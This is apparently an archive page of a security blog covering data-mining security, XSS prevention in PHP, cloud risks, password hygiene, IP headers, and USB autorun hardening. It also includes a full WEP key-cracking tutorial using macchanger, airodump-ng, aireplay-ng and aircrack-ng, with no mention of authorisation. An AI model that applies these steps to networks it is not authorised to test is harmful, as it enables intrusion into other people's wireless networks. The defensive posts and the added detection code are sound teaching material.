*Parallelized* Data Mining (PDM) Security

April 12th, 2011   •   32 Comments   

Parallel Data Mining is currently attracting much research. The objects involved in ‘Parallel Data Mining’ include a special type of entity with the ability to migrate from one processor to another, where it can resume or initiate its execution. In this article we consider security issues that need to be addressed before these systems in general, and ‘parallelized systems’ in particular, can be a viable solution for a broad range of commercial tools.

In this section we will briefly describe some properties of these systems, and of parallelized systems in particular. This is not intended to be a complete description of ‘anything and everything’ about the above-mentioned topics; we try to focus on issues with possible security implications.

Here, when we speak of ‘entities’ we mean an ‘object / process / matter / material / data stream’ that exhibits some kind of independent, self-contained ‘intelligence’. So we can say: “An entity is often assumed to represent another entity, such as an integrated output of a classified cluster or some other organization or environment on whose behalf it is acting”. No single universal definition of entity exists, but there are certain widely agreed characteristics of entities; these include fluctuating ambiance/environment, autonomy, and elasticity.

  • [+] Fluctuating Ambiance means that the entity receives tactile input from its environment and that it can perform actions which change the environment in some way.
  • [+] Autonomy means that an entity is able to act without the direct intervention of other entities (or other objects), and that it has control over its own actions and internal state.
  • [+] Elasticity can be defined to include the following properties:
    • - Responsive: refers to an entity’s ability to perceive its environment and respond in a timely fashion to changes that occur in it;
    • - Pro-active: entities are able to exhibit opportunistic, goal-driven behavior and take the initiative where appropriate;
    • - Social: Entities should be able to interact, when appropriate, with other entities and humans in order to solve their own problems (like distributing instructions to various sects, assigning instructions to respective processors with respect to certain considerations etc.) and to help other entities with their activities.

A number of other attributes are sometimes discussed in the context of ‘Augur’. These include but are not limited to:

  • [+] Rationale: The assumption that an event will not act in a manner that prevents it from accomplishing its goals and will always attempt to fulfill those goals.
  • [+] Candor: The concept that an event will not ‘knowingly’ communicate false information.
  • [+] Cordiality: An entity cannot have conflicting goals that either force it to transmit false information or to effect actions that cause its goals to be unfulfilled or impeded.
  • [+] Mobility: The ability for an agent to move across networks and between different hosts to fulfill its goals.

Platforms or the desired infrastructure provide entities with environments in which they can execute. A platform typically also provides additional services, such as communication facilities, to the entities it is running. In order for entities to be able to form a useful parallel system where they can communicate and cooperate, certain functionality needs to be provided to the entities. This includes functionality to find other entities or find particular services. This can be implemented as services offered by other processes or services more integrated with the infrastructure itself. Examples of such services include facilitators, mediators, and matchmakers etc.

Security Issues with Parallel Data Mining

In this section we will discuss security issues based on the characteristics described above:

1) Entity Execution: Naturally, entities need to execute somewhere. A host, and the immediate environment of an entity, is ultimately accountable for the accurate execution and protection of the entity. This leads straight to the question of where access control decisions should be performed and enforced. Does the entity contain all the logic and information required to decide if an incoming request is authentic (originating from its claimant) and, if so, whether it is authorized (has the right to access the requested information or service)? Or can the agent rely on the platform for access control services? The environment might also need certain protection from the objects that it hosts. An event should, for example, be prevented from launching a denial of service attack by consuming all resources on a processor, thus preventing the host from carrying out other things (such as executing other scheduled events).

2) Fluctuating Ambiance: What the term ‘environment’ means depends entirely on the application, and its use in the events literature appears almost arbitrary; it can, for example, be the ‘International Network’, viz. the Internet, or the host on which the entity is executing. An entity is assumed to be ‘conscious’ of certain states or events in its environment. Depending on the ‘nature and origin’ of this information, its authenticity and availability need to be considered. If an event’s ‘environment’ is limited to the processor on which it is executing, no specific security measures might be necessary (assuming the host environment is difficult to spoof, keeping in mind the ‘objective proportional to time’ ratio). The situation is, however, likely to be totally different if the event receives environment information from, or via, the Internet.

3) Autonomy: This property, when combined with other features given to entities, can introduce serious security concerns. If an entity is, for example, given authority to perform an objective, it should not be possible for another ‘party’ to force the event into committing to something it would not normally commit to. Neither should an event be able to make commitments it cannot fulfill. Hence, issues around delegation need to be considered for ‘entities ➨ events’ / instructions. The autonomy property does not necessarily introduce any ‘new’ security concerns; this property is held by many existing systems. It is worth mentioning that worms and viruses also hold this property, which enables them to spread efficiently without requiring any (intentional or unintentional) object interaction. The lesson is that powerful features can also be ‘remixed’ and used for malicious purposes if not properly controlled in a controlled environment.

4) Communication Botheration: Of the ‘Elasticity’ properties, social behavior is certainly interesting from a security point of view. It means that entities can communicate with other events. Just as an entity’s communication with its surroundings / environment needs to be protected, so does its communication with other events. The following security properties should be provided:

  • - Confidentiality: Affirmation that communicated / proclaimed information is not accessible to unauthorized parties;
  • - Data integrity: Affirmation that communicated / proclaimed information cannot be switched over / shaped / manipulated by unauthorized parties without being detected;
  • - Authentication of origin: Affirmation that communication is originating from its claimant;
  • - Availability: Affirmation that communication reaches its intended recipient in a timely fashion (‘Secure Negotiation’ protocols play a HUGE role here);
  • - Non-repudiation: Affirmation that the originating entity can be held responsible for its communications.

It’s a fact that “security usually comes at a cost”. Additional computing and communication resources are required by most solutions that provide the previously mentioned security functionality. Therefore, security needs to be dynamic. It often makes sense to protect all communication within a system to the same level, as the actual negotiation of security mechanisms ‘MAY’ then be avoided. However, in large-scale parallelized data mining systems, security services and mechanisms need to be adjusted or tweaked to the purpose and nature of the communications of various applications with varying security requirements. Some implementations of varied architectures in the same niche assume that security can be provided transparently by a lower layer, i.e. by adding it to data sects while distributing them to varied problems. This approach might be sufficient in closed or, more precisely, localized systems where the entities can trust each other and the sole concern is external malicious parties.

5) Maneuverability: The use of movable or mobile entities raises a number of security concerns. Entities need protection from other entities and from the hosts on which they execute. Similarly, hosts need to be protected from entities and from other objects / parties (tools getting co-mingled with processes through varied forms of injection and other vulnerable loopholes) that can communicate with the platform. The problems associated with the protection of hosts from malicious code are well understood. The problem posed by malicious hosts to entities and the environment seems more complex to solve. Since an entity is under the control of the executing host, the host can in principle do anything to the event and its code.

The attacks that a malicious host can mount can be summarized as follows.

  • - Observation of code, data and flow control.
  • - Manipulation of code, data and flow control – including manipulating the route of an entity
  • - Incorrect execution of code
  • - Denial of execution – either in part of an event or whole
  • - Masquerading as a different host
  • - Eavesdropping and Manipulating other event communications

6) Rationality, Candor, and Cordiality: The meaning (from a security point of view) of these properties seems to be: “Events are well behaved and will never act in a malicious manner.” If we make this a bona fide requirement, then the redundancy required for such a system is likely to make the system useless. Affirmation that only information from trusted sources is acted upon and that events (or their initiators) can be held responsible for their actions, as well as monitoring and logging of event behavior, are mechanisms that can help in drafting a system where the implications of malicious events / entities can be minimized.

7) Identification and authentication: Identification is not primarily a security issue in itself; however, the means by which an entity is identified are likely to affect the way an entity can be authenticated, i.e. if the labeling environment of an event gets knocked out or uncontrolled, further actions would result the same. For example, an entity could simply be identified by something like a serial number, or its identity could be associated with its origin, owner, capabilities, or privileges. If identities are not permanent, security-related decisions cannot (more precisely, should not) be made on the basis of an entity’s identity. While an entity’s identity is of major importance to certain applications and services, it is not needed in others. In fact, entities are likely to be ideal for providing anonymity to their initiators, as they are independent pieces of code, possessing some degree of autonomy, and do not require direct third party interaction.

 

In our next post we will take up some technologies and methodologies which could get the above security issues ‘in a frame’.

Can also see the post @Sectruni0.

Compliance Hacking | A new and defined terminology!

March 11th, 2011   •   No Comments   

Things which are ethical for me may not be ethical for you, so when we talk about something ethical, it’s all about moral philosophy, and in my view moral philosophy is nothing more than a perception, which varies from person to person and from community to community.

Take a case where a hacker group from Pakistan tries to hack into India’s government communication system: it may be considered ethical by the Pakistani community, but it is totally unethical if you ask an Indian. For instance, check out the words in the news posted on one of Pakistan’s news portals and follow up with the comment about the latest CBI hack attack. Similarly, take another example:

“A squadron of Israel Air Force entered the airspace of Syria and pulverised an under construction nuclear fuel enrichment plant of Syria and returned home safely. Not a single shot was fired by Syrian Air Defence system because for those specific moments the Anti-Aircraft Control Plot of Syrian air defence system was disabled by Israel’s Signal Intelligence Unit 8200. Operation Orchard was successful.”

(source: http://www.securitywatchindia.org.in/PDFs/Salute%20March%202011.pdf) Read this recently published article, page no. 34, and tell me: if you were an Israeli, what would you call it, ethical or unethical?

Compliance Hacking is a pure Information Security Terminology introduced by a well-known Information Security expert “Commander Saini” and lately endorsed by a reputed organisation IAMAI, acronym of Internet And Mobile Association of India.

I totally agree with the concept behind the naming of this term; the best thing I like about it is one

Thwarting XSS!

January 7th, 2011   •   41 Comments   

Data containing HTML or JavaScript can be one of the biggest problems, especially when it is supplied by a ‘user’. Take a simple application like a blog, where a user can submit comments after reading a post, and those comments are then displayed. If the user is ‘not-that-bad’ and enters only plain text, there is no problem. But suppose the user submits the data

<b><i>Post seems great.</i></b>

What will happen? The situation is not as easy as it seems. Browsers cannot tell the difference between the blog’s own HTML tags and tags embedded in a comment; the submitted markup is rendered directly as part of the page.

It is still tolerable if the user closes the HTML tags, as in the code above, where every tag is closed properly. If the tags are not properly closed, the situation gets much worse: the browser can no longer display the page correctly. For example, if someone submits the following, the effects may not be that good!

<b or > or <a href="

The situation gets worse if the input contains JavaScript. A malicious person can send your cookies to his inbox, redirect your pages to another web page, or steal the passwords which are saved in the ‘browser’. A lot of things can be done with JavaScript.

Problems of this kind, where someone injects something that indirectly achieves many things, are called XSS (Cross Site Scripting) attacks.

To be safe from XSS you need to write your code carefully, keeping in mind that *you should never display direct input from the user*. You need to remove the HTML tags/scripts before displaying the input on the site.

PHP gives you two functions to remove the HTML tags or encode the special characters.
1. strip_tags() : It removes the HTML tags from the string
2. htmlentities() : It encodes the special HTML characters.

Let’s see how to use those functions:

// Remove the HTML tags from the comment
$comment = strip_tags($_POST['comment']);
print $comment;

If $_POST['comment'] contains

<b>Hi..</b> Your <div> <span>article</span> </div> seems <i>perfect.</i>

it will simply display:

Hi.. Your article seems perfect.

Now let’s see the htmlentities function:

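// Encode the HTML special characters in the comment
// (ENT_QUOTES also encodes single quotes; state the charset explicitly)
$comment = htmlentities($_POST['comment'], ENT_QUOTES, 'UTF-8');
print $comment;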

If $_POST['comment'] contains

<b>Hi..</b> Your <div class="heading1"> <span>article</span> </div> is <i>awesome.</i>

it will display:

&lt;b&gt;Hi..&lt;/b&gt; Your &lt;div class=&quot;heading1&quot;&gt; &lt;span&gt;article&lt;/span&gt; &lt;/div&gt; is &lt;i&gt;awesome.&lt;/i&gt;

The characters have been changed:
< to &lt;
> to &gt;
" to &quot;

Now the browser will display the submitted markup as literal text, however bizarre those not-so-good inputs from a malicious user look.

You also need to handle the default values of a form to be protected from XSS.
Make an array of default values, as in the example:

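// Reuse the submitted values if the form was posted, otherwise use defaults
if (!empty($_POST['_submit_check'])) {
    $default = $_POST;
} else {
    $default = array('name'    => 'abc',
                     'email'   => 'abc@abc.com',
                     'web'     => 'www.google.com',
                     'comment' => 'xyz'); // key matches the textarea name
}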

See how to set the default value in a multiline text area:

print '<textarea name="comment">';
// Encode the value so submitted markup cannot break out of the textarea
print htmlentities($default['comment']);
print '</textarea>';

This can be a way of how we can prevent injecting scripts...

Reposted from 'Kuwait Hackers'

ENISA’s Cloud Computing Risk Summary

September 15th, 2010   •   8 Comments   

ENISA’s report on Cloud Security identified a number of places where risk elements exist: the report acknowledged 8 high risk items & 29 medium risk items in the areas of Policies & Organizational Risks, Technical Risks, Legal Risks, and Cloud Unspecific Risks. In summary, the elements labeled as *key risks* are briefed below:

(1) Loss Of Governance: In using cloud infrastructure, the client necessarily cedes control to the cloud provider on a number of issues which may affect security. At the same time, service level agreements may not offer a complete commitment to provide such services on the part of the cloud provider, thus leaving a gap in the security defenses. Lack of governance is the key issue here.

Vulnerabilities:

  • V34: Unclear Roles and Responsibilities.
  • V35: Poor enforcement of role definitions.
  • V21: Synchronizing responsibilities or contractual obligations to different stakeholders
  • V23: SLA clauses with conflicting promises to different stakeholders
  • V25: Audit or certification not available to consumers
  • V18: Lack of standard technologies and solutions
  • V22: Cross cloud applications creating hidden dependency
  • V29: Storing of data in multiple jurisdiction and lack of transparency about THIS
  • V14: No source escrow agreement
  • V16: No control on vulnerability assessment process
  • V26: Certification schemes not adapted to cloud infrastructures
  • V30: Lack of information on jurisdictions
  • V31: Lack of completeness and transparency in terms of use
  • V44: Unclear assets ownership

Affected Assets:

  • A1: Company reputation
  • A2: Customer trust
  • A3: Employee loyalty and experience
  • A5: Personal sensitive data
  • A6: Personal Data
  • A7: Personal Data: Critical
  • A9: Service delivery- real time services
  • A10: Service delivery

(2) Lock In Situation: The ‘lock-in situation’ has also been considered. There is currently little on offer in the way of tools, procedures, standard data formats or ‘as a service’ interfaces that could guarantee data, application and service portability.
This can make it difficult for customers to migrate from one provider to another, or to migrate data and services back to an in-house IT environment. It introduces a dependency on particular cloud providers for service provision, especially if data portability, the most fundamental aspect, is not enabled.

(3) Isolation failure: Cloud providers work mostly in multi-tenant environments, and shared resources are a defining characteristic of cloud computing. This risk category covers the failure of the mechanisms separating storage, memory, routing and reputation between different tenants. However, it should be considered that attacks on resource isolation mechanisms are still less numerous, and much more difficult for attackers to put into practice, compared to attacks on traditional operating systems.

(4) Compliance Risks: One of the key items is, of course, compliance risk. Investment in achieving certification may be put at risk by migrating to the cloud if the cloud provider cannot provide evidence of its own compliance with the relevant requirements, or if the cloud provider does not permit audits by the cloud customer. In certain cases it also means that using a public cloud infrastructure implies that a certain kind of compliance cannot be achieved (for example PCI).

Vulnerabilities:

  • V25: Audit or certification not available to consumers
  • V13: Lack of standard technologies and solutions
  • V29: Storage of data in multiple jurisdictions and lack of transparency about this.
  • V26: Certification scheme not adapted to cloud infrastructure
  • V30: Lack of information on jurisdiction
  • V31: lack of completeness and transparency in terms of use

Affected Assets:

  • A20: Certification

(5) Management Interface Compromise: Management interface compromise (MIC) may also be an issue: the customer management interfaces of a public cloud provider pose an increased risk, especially when combined with remote access and web browser vulnerabilities.

(6 & 7) Data protection & Insecure or incomplete data deletion: Cloud computing poses several data protection risks for cloud providers and customers. In some cases it may be difficult for the cloud customer to get the ‘correct level’ of data protection at all, and if, for example, you leave a cloud provider, it must be guaranteed that your data is completely deleted. When a request to delete cloud resources is made, as with most operating systems, this may not result in the data being wiped. Adequate or timely data deletion may also be impossible, for instance because extra copies of the data are stored but unavailable.

Vulnerabilities:

  • V30: Lack of information on jurisdiction
  • V29: Storage of data in multiple jurisdictions and lack of transparency about this.

Affected Assets:

  • A1: Company reputation
  • A2: Customer trust
  • A5: Personal sensitive data
  • A6: Personal Data
  • A7: Personal Data: Critical
  • A9: Service delivery- real time services
  • A10: Service delivery

(8) Malicious insider: While usually less likely, the damage which may be caused by a malicious insider is often far greater. Cloud architectures necessitate certain roles which are extremely high risk; examples include cloud provider system administrators and managed security service providers.

Reposted from Sectruni0
This post can also be viewed here.

Online Safety: Things to Do & Things to Avoid

March 12th, 2010   •   6 Comments   
Whether it is a battlefield or a football field, there are always certain safety tips given to people before they go anywhere, & it is recommended to follow them all.

In the same way, for your online safety, there are things that you should know before you go online.

Things to do:

  • Use a combination of alphabets (both upper & lower case characters), numbers and symbols with at least 8 characters when creating a password.
  • Change your password immediately at your first login if it is a default password, a temporary password or one you received via email.
  • Change your password periodically, that is, after a fixed interval of time.
  • If using a public computer, remember to log out after completing your online session (prefer a PDA/mobile instead if you don’t have access to a personal computer).
  • If you store your passwords in files on your computer, remember to encrypt them using some kind of predefined algorithm or a file encryption tool such as TrueCrypt or dsCrypt.
  • Also make sure that anyone watching you enter your password cannot guess it as you type; a password typed with a single hand, for instance, can be seen easily.
  • On the login page, check for a secure login session (SSL encryption) before you submit your password to the server. Also confirm the certificate owner by double-clicking the lock icon. For instance, in the case of https://mail.google.com , https confirms that the page is secure and the data/password you submit will be encrypted during transmission.

Things to Avoid:

  • Avoid using dictionary words, your name, important dates or other such personal information that can be easily obtained, both for passwords and for security questions.
  • Don’t use the same password for multiple online accounts.
  • Also avoid using repeating characters (AAAAA or 11111) or keyboard patterns (qwerty or 123456).
  • Never send your password via email.
  • Never use a public computer (in cyber cafes, shops, hotels etc.) to access a site that requires login, as it may contain a Trojan, keylogger, spyware or other such malware which works in stealth mode.
  • Never reply to mail which claims to come from any of your online account services (such as Yahoo, Hotmail, eBay or Amazon) and asks you to disclose or verify your password; this could be a spoofed mail or a phishing attack to steal your password.
  • Never use a password generator/manager or similar utilities from an untrusted source.
  • Never store your password in plain text format or on a sticky note.
  • And most importantly, keep your password private. If for some reason you handed your password to someone to access your account, remember to change it once their access is no longer required.


Please note, these are just a few points which help keep your password safe and protect your online privacy, but they are not enough to stay safe from other cyber threats. There are a lot of other little things that should be kept in mind in order to stop attacks on your online privacy.

Understanding IP datagram – the easy way

December 24th, 2009   •   8 Comments   

It is important to understand the information presented in an IP packet, as it helps you understand how the integrity of the information you send across a local network or the Internet can be compromised.

An IP datagram has two main components: the header and the payload. The header contains addressing and control fields, while the payload carries the actual data.

For easy understanding, I have listed the IP datagram header fields with a brief explanation of each:

IP Datagram Header

Version: This field identifies the IP version of the packet; it could be IPv4 or IPv6, and in my example it is IPv4.

Header Length: This field identifies the size of the IP header. It specifies the header length in multiples of 4 bytes, so a value of 5 means the header is 20 bytes long.

Type of Service: This field helps routers understand how they should queue the IP datagram; however, it is ignored by most routers. Service levels that can be requested include level of priority, short delay, high throughput and reliability.

Total Length: This is the length of the entire packet measured in bytes and includes both header and payload.

Identification: The value of this field is set by the sender of the packet and is used for reassembly of the IP datagram at the destination.

Flags: The Don’t Fragment and More Fragments flags indicate whether an IP datagram can be fragmented and, if so, whether this is the last fragment.

Fragment offset: It specifies where in the IP datagram this fragment belongs, measured in units of 8 bytes (64-bit blocks).

Time to live: It specifies the maximum number of links or hops a packet can pass through; if the number decreases to 0 before reaching the destination, the packet is destroyed.

Protocol: It identifies the protocol used at the transport layer; it could be TCP or UDP.

Header Checksum: This field checks for integrity of the header information but not the data.

Source: The IP address of the Source computer.

Destination: This is the IP address of the destination computer.

IP Options: This field is optional, it can be used to add loose source routing at the end of an IP header.

Also read RFC 791 for a better understanding.
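The header layout described above, decoded in Python as an added example (not code from the original post); the sample packet is constructed with documentation addresses, and the function names are this example's own. It also shows the Header Checksum point in practice: a change to a header field is detected, a change to the payload is not.

```python
import ipaddress
import struct

PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP"}


def checksum16(data: bytes) -> int:
    """Internet checksum: complement of the one's-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold the carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_ipv4_header(packet: bytes) -> dict:
    """Decode the IPv4 header fields and verify the header checksum."""
    if len(packet) < 20:
        raise ValueError("shorter than the minimum 20-byte IPv4 header")
    (ver_ihl, tos, total_length, ident, flags_frag,
     ttl, proto, checksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 datagram")
    header_length = (ver_ihl & 0x0F) * 4     # the field counts 4-byte words
    if header_length < 20 or header_length > len(packet):
        raise ValueError("invalid header length")
    return {
        "version": 4,
        "header_length": header_length,
        "type_of_service": tos,
        "total_length": total_length,
        "identification": ident,
        "dont_fragment": bool(flags_frag & 0x4000),
        "more_fragments": bool(flags_frag & 0x2000),
        "fragment_offset": (flags_frag & 0x1FFF) * 8,   # field counts 8-byte blocks
        "ttl": ttl,
        "protocol": PROTOCOLS.get(proto, str(proto)),
        "header_checksum": checksum,
        # Summing a valid header including its checksum field yields 0.
        "checksum_ok": checksum16(packet[:header_length]) == 0,
        "source": str(ipaddress.IPv4Address(src)),
        "destination": str(ipaddress.IPv4Address(dst)),
        "options": packet[20:header_length],
        "payload": packet[header_length:total_length],
    }


def build_sample_packet() -> bytes:
    """Constructed sample: 20-byte header (DF set, TTL 64, TCP) + 20 dummy payload bytes."""
    src = ipaddress.IPv4Address("192.0.2.10").packed
    dst = ipaddress.IPv4Address("198.51.100.7").packed

    def header(cksum: int) -> bytes:
        return struct.pack("!BBHHHBBH4s4s",
                           0x45, 0, 40, 0x1C46, 0x4000, 64, 6, cksum, src, dst)

    # The checksum is computed over the header with the checksum field zeroed.
    return header(checksum16(header(0))) + b"\x00" * 20


if __name__ == "__main__":
    pkt = build_sample_packet()
    for name, value in parse_ipv4_header(pkt).items():
        print(f"{name:16} {value}")

    header_changed = bytearray(pkt)
    header_changed[8] = 63                   # TTL altered without fixing the checksum
    print("header changed  ->", parse_ipv4_header(bytes(header_changed))["checksum_ok"])

    payload_changed = bytearray(pkt)
    payload_changed[25] ^= 0xFF              # payload byte flipped
    print("payload changed ->", parse_ipv4_header(bytes(payload_changed))["checksum_ok"])
```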

Learn to Love your Log files

December 21st, 2009   •   No Comments   

Yes! Learn to love your log files; they tell you everything you want to hear.

Even a clever thief always leaves fingerprints somewhere at the crime scene; in the same way, most malicious exploits and intruders leave their fingerprints, or say footprints, all over the log files. If the log file management system is set up correctly, it will tell you everything about the actual attack.

You can expect a good result by setting up an event management system that will collect, filter, and analyze your log file data, then prioritize and generate alerts.

Download this PDF(published by NIST U.S. Department of Commerce) and Read this whole story from Introduction to Operational Process.

Protecting Removable drive against malware

November 26th, 2009   •   6 Comments   

Today, one of the fastest mediums used by malware for infection is removable drives. Worms use them to replicate faster: once your removable drive comes in contact with an infected system, it gets infected automatically by the malicious services running on that system. One of the first tasks done by the malicious services is to create an AUTORUN information file on the removable drive for further propagation.

Once you open such an infected removable drive on any PC, the AUTORUN file does its task. But the question is: how?

The AUTORUN file contains code for instantly executing an infected executable file which was copied earlier somewhere onto the removable drive by the malicious services.

The code within the AUTORUN information file looks something like this:

[AUTORUN]
OPEN=recycler/setup.exe

In the above script, recycler is a folder on the removable drive which contains the infected executable file (copied earlier by the malicious services) that is now being used by the AUTORUN file for propagation.

We can protect our removable drives against these worms by restricting changes to the Autorun.inf file.
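A defender-side check for the pattern just described, as an added example (not from the original post): it parses the text of an autorun.inf, flags launch entries that point at an executable or into one of the recycle-style folders the post names, and reports whether a drive root holds autorun.inf as a file or as a folder. The function names, the extension list and the benign sample are assumptions of this example.

```python
import os
import re

# Folder names the post associates with infected drives.
SUSPECT_DIRS = {"recycle", "recycler", "recycled"}
# Assumed list of directly runnable extensions worth flagging.
EXEC_EXTS = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs")

# Constructed samples: the first is the snippet shown in the post.
SAMPLE_INFECTED = "[AUTORUN]\nOPEN=recycler/setup.exe\n"
SAMPLE_BENIGN = "; vendor file\n[autorun]\nicon=drive.ico\nlabel=Backup\n"


def parse_autorun(text):
    """Return {key: value} from the [autorun] section (names are case-insensitive)."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def launches_program(key):
    """Keys that start a program: open, shellexecute, shell\\<verb>\\command."""
    return key in ("open", "shellexecute") or (
        key.startswith("shell\\") and key.endswith("\\command"))


def audit_autorun(text):
    """Return a list of (key, value, reasons) for suspicious launch entries."""
    findings = []
    for key, value in parse_autorun(text).items():
        if not launches_program(key):
            continue
        target = value.strip('"').lower()
        parts = [p.strip() for p in re.split(r"[\\/]+", target) if p.strip()]
        reasons = []
        if any(p in SUSPECT_DIRS for p in parts):
            reasons.append("target is inside a recycle-style folder")
        if any(p.split()[0].endswith(EXEC_EXTS) for p in parts):
            reasons.append("target is an executable file")
        if reasons:
            findings.append((key, value, reasons))
    return findings


def check_drive(root):
    """Classify autorun.inf at a drive root: 'absent', 'folder' or 'file' + findings."""
    name = next((n for n in os.listdir(root) if n.lower() == "autorun.inf"), None)
    if name is None:
        return ("absent", [])
    path = os.path.join(root, name)
    if os.path.isdir(path):
        # A folder of that name cannot be replaced by a plain autorun.inf file.
        return ("folder", [])
    with open(path, "r", encoding="latin-1") as fh:
        return ("file", audit_autorun(fh.read()))


if __name__ == "__main__":
    for label, sample in (("infected", SAMPLE_INFECTED), ("benign", SAMPLE_BENIGN)):
        print(label, audit_autorun(sample))
```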

Step1: Create four folders in the root directory of your removable drive, named Autorun.inf, Recycle, Recycler and Recycled.
Step2: Go to Start>Run and type cmd to open the Command Prompt.
Step3: Now type the commands below one by one:
attrib autorun.inf /s /d -a +s +r
cacls autorun.inf /c /d administrators
Step4: Repeat Step3 for Recycle, Recycler and Recycled.

In the above procedure, the attrib command is used to set the folder attributes, and cacls is used to edit the folder's access control list to deny access to members of the administrators group.

Once you have completed this task successfully, you won’t be able to delete, rename, modify, copy or open these folders, and this also prevents malicious services running on any system from modifying them or copying infected files into them on the removable drive.


Cracking wireless Network WEP protection

October 29th, 2009   •   34 Comments   

Things required:

  • A compatible wireless Adapter: There are lots of compatible wireless adapter available, but what you need to care about is the size of your Pocket or say your budget. One can easily go for a good Alfa adapter that is easily available in Amazon but I’ll recommend going for AirPcap Adaptor which I discussed before in my previous thread.
    However Alfa “AWUS036H/AWUS036H + 9dBi” will be the best option as it is considered as the cheap & Best for everyone.
  • Back Track Live CD: Click here to download its DVD ISO if you don’t have one in your Collection. BackTrack is a Popular Linux distribution basically used for Penetration Testing.

Boot your system using the Back Track Live CD and log in with the default username & password (Usr:root & Pwd:toor). Once authenticated, just type startx to bring up the KDE desktop.

Launch Konsole, a built-in command line interface, and follow the steps below:

  • Type airmon-ng to get a list of available network interface cards.
  • Choose the one you want to use to crack WEP encryption and type airmon-ng stop interface_name to disable its monitor mode.
  • Now you need to change your MAC address to a fake one, but first make sure your card is disabled. You can disable your interface card with the command ifconfig interface_name down
  • To change your MAC address, use the command macchanger --mac 11:22:33:44:55:66 interface_name
  • Restart monitor mode for this interface by running airmon-ng start interface_name

Once you have successfully faked your MAC address, you can move on to the next step:

  • Run airodump-ng interface_name to bring up the list of available wireless networks or access points.
  • Note down the BSSID, channel number (CH) and ESSID of the network whose WEP encryption you want to crack.
  • Now we need to capture all the packets to a file: type airodump-ng -c (Channel_Number) -w (file_name) --bssid (BSSID) interface_name
  • Run aireplay-ng -1 0 -a (BSSID) -h 11:22:33:44:55:66 -e (ESSID) interface_name
  • Now run aireplay-ng -3 -b (BSSID) -h 11:22:33:44:55:66 interface_name

The above command will create a large amount of traffic and consume more memory and processor time; just sit back and watch the number in the #Data column.
Once you have received more than 10000 data packets, it's time for the final countdown.

Open a new console window and run the command below:
aircrack-ng -b (BSSID) filename-01.cap

This final command should print the WEP key; if it doesn’t, you may need to capture more data packets for aircrack-ng to complete successfully.

Note:
interface_name refers to the name of your wireless interface (Ex- wth0/eth0)
BSSID refers to the BSSID of the wireless network
Channel Number refers to the channel number of the wireless network
ESSID refers to the name or SSID of the wireless network

Click the link for more information on Alfa AWUS036H or AWUS036H+9dBi
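
For defenders, the two aireplay-ng steps above leave visible traces: one station sending the access point a stream of near-identical frames, and here a source MAC (11:22:33:44:55:66) whose group bit is set. The following Python sketch is an added example, not part of the original post; the record format, thresholds and sample frames are constructed assumptions.

```python
from collections import Counter, defaultdict

# Thresholds are assumptions for this sketch; tune them to your own baseline.
WINDOW_SECONDS = 10
MIN_FRAMES = 200           # frames from one station inside the window
MIN_SAME_LEN_RATIO = 0.9   # share of those frames with one identical length


def is_group_address(mac):
    """True when the I/G bit (lowest bit of the first octet) is set.
    A real station transmits from a unicast address, so this is anomalous."""
    return bool(int(mac.split(":")[0], 16) & 0x01)


def find_replay_suspects(frames):
    """frames: (timestamp, src_mac, bssid, frame_len) tuples from a monitor.
    Returns {(src_mac, bssid): [reasons]} for stations that look like they
    are re-sending one captured frame at a high rate."""
    by_station = defaultdict(list)
    for ts, src, bssid, length in frames:
        by_station[(src.lower(), bssid.lower())].append((ts, length))
    suspects = {}
    for key, seen in by_station.items():
        reasons = []
        if is_group_address(key[0]):
            reasons.append("source MAC has the group bit set")
        seen.sort()
        start = 0
        for end in range(len(seen)):
            while seen[end][0] - seen[start][0] > WINDOW_SECONDS:
                start += 1
            window = seen[start:end + 1]
            if len(window) < MIN_FRAMES:
                continue
            top_len, count = Counter(n for _, n in window).most_common(1)[0]
            if count / len(window) >= MIN_SAME_LEN_RATIO:
                reasons.append(f"{len(window)} frames within {WINDOW_SECONDS}s, "
                               f"{count} of length {top_len}")
                break
        if reasons:
            suspects[key] = reasons
    return suspects


# Constructed sample: a normal laptop, then a station using the page's fake MAC.
AP = "00:aa:bb:cc:dd:ee"
SAMPLE = [(i * 0.5, "3c:22:fb:10:20:30", AP, 60 + (i * 37) % 900) for i in range(40)]
SAMPLE += [(5 + i * 0.02, "11:22:33:44:55:66", AP, 86) for i in range(400)]
```

Calling find_replay_suspects(SAMPLE) flags only the station with the spoofed address; the laptop's mixed-size, low-rate traffic stays below both thresholds.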

Build your own Web Proxy in 10 Easy Steps

October 23rd, 2009   •   12 Comments   

With the emergence of the World Wide Web, the threat of identity theft has greatly increased. People now use electronic mail instead of traditional mail as their default mode of communication, and instead of using cash to buy what they need, they use credit cards online to buy whatever they wish. This has made everything vulnerable to theft of data as well as identity. To counter these threats, Internet geeks have already started using web proxies to safeguard their online security, but using a public proxy server is still risky, as you cannot trust people you don’t know.

Here I’m going to discuss a free and easy way to build your own Windows-based web proxy server, in simple steps that anyone with basic networking knowledge and administrative privileges can use to increase their level of security.

Software Requirements:

  • OpenSSH
  • Putty
  • Privoxy
  • PortableFirefox

Steps involved in Installation & Configuration:

  1. Install OpenSSH on your PC
  2. Install Privoxy on your PC/Server
  3. Now install Putty/PortaPutty and PortableFirefox on your thumbdrive.
  4. Since you have already installed OpenSSH, run it once and make sure the SSHD service is running as the system account and the server is configured to listen on port 443. Also make sure you are able to SSH into your server from another machine on the same network.
  5. Configure Privoxy to run as a service and make sure it is set to communicate on its default port, 8118.
  6. Now double-click Putty to open its basic configuration window and specify the following:
    • Hostname (or IP address) : ip_address_of_server
    • Port : 443
    • Protocol : SSH
  7. Now go to SSH>Tunnels and make the following entries in the specified fields:
    • Source Port : 8118
    • Destination : 127.0.0.1:8118
    • Click the radio buttons to select Local and Auto
  8. Now go back to the Session section where you specified the hostname (IP address), and save this whole session under a new name.
  9. Finally, open Firefox, go to Tools>Option>General tab>Connection Settings and select Manual Proxy Configuration:
